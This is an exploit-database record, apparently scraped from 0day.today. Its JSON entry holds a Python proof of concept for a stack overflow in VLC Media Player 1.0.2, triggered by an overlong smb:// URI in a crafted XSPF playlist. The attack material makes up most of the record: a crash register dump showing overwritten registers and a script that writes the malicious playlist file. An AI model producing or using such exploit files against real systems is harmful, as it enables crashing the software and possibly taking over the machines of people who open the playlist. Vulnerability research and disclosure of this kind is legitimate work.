Description
Exploit for unknown platform in category remote exploits
{"id": "1337DAY-ID-9542", "type": "zdt", "bulletinFamily": "exploit", "title": "VLC Media Player 1.0.2 smb:// URI stack overflow PoC", "description": "Exploit for unknown platform in category remote exploits", "published": "2009-09-25T00:00:00", "modified": "2009-09-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/9542", "reporter": "Dr_IDE", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-08T14:23:42", "viewCount": 5, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/9542", "sourceData": "====================================================\r\nVLC Media Player 1.0.2 smb:// URI stack overflow PoC\r\n====================================================\r\n\r\n\r\n# Title: VLC Media Player 1.0.2 smb:// URI stack overflow PoC\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Dr_IDE\r\n# Published: 2009-09-25\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n##########################################################################################################\r\n#\r\n# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC\r\n# Found By: Dr_IDE\r\n# Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 \"Goldeneye\"\r\n# Download: http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27878899d30ec7cd947\r\n#\r\n##########################################################################################################\r\n \r\n# XPSP3 Crash\r\n\"\"\"\r\nEAX FFFFFFFE\r\nECX 42424242 <--------- w00t!\r\nEDX 00000000\r\nEBX 42424242\r\nESP 02EAF694\r\nEBP 02EAF7C4\r\nESI 61CC8324 libacc_4.61CC8324\r\nEDI 61CC8323 libacc_4.61CC8323\r\nEIP 77C478AC msvcrt.77C478AC\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 0 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFAC000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)\r\nEFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)\r\nST0 empty -UNORM FB18 0184A1C0 00AD4518\r\nST1 empty +UNORM 2088 00000000 00000000\r\nST2 empty 0.3987488760738806780e-4933\r\nST3 empty -??? FFFF 00000000 77C2C42E\r\nST4 empty +UNORM 0B10 00B094E8 00000000\r\nST5 empty 0.3987486256431287370e-4933\r\nST6 empty 0.0\r\nST7 empty -0.2650710894356302916\r\n 3 2 1 0 E S P U O Z D I\r\nFST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n\"\"\"\r\nheader1 = (\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n\")\r\nheader1 += (\"<playlist version=\\\"1\\\" xmlns=\\\"http://xspf.org/ns/0/\\\" xmlns:vlc=\\\"http://www.videolan.org/vlc/playlist/ns/0/\\\">\\n\")\r\nheader1 += (\"\\t<title>Playlist</title>\\n\")\r\nheader1 += (\"\\t<trackList>\\n\")\r\nheader1 += (\"\\t\\t<track>\\n\")\r\nheader1 += (\"\\t\\t\\t<location>smb://[email\u00a0protected]/foo/#{\")\r\n \r\npayload = (\"\\x41\" * 2 + \"\\x42\" * 4 + \"\\x43\" * 10000)\r\n \r\nheader2 = (\"}</location>\\n\");\r\nheader2 += (\"\\t\\t\\t<extension application=\\\"http://www.videolan.org/vlc/playlist/0\\\">\\n\");\r\nheader2 += (\"\\t\\t\\t\\t<vlc:id>0</vlc:id>\\n\");\r\nheader2 += (\"\\t\\t\\t</extension>\\n\");\r\nheader2 += (\"\\t\\t</track>\\n\");\r\nheader2 += (\"\\t</trackList>\\n\");\r\nheader2 += (\"</playlist>\\n\");\r\n \r\ntry:\r\n f1 = open(\"vlc_1.0.2.xspf\",\"w\")\r\n f1.write(header1 + payload + header2)\r\n f1.close()\r\n print(\"\\nExploit file created!\\n\")\r\nexcept:\r\n print \"Error\"\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1646782457, "score": 1659766679, "epss": 1678811959}}
{}
VLC Media Player 1.0.2 smb:// URI stack overflow PoC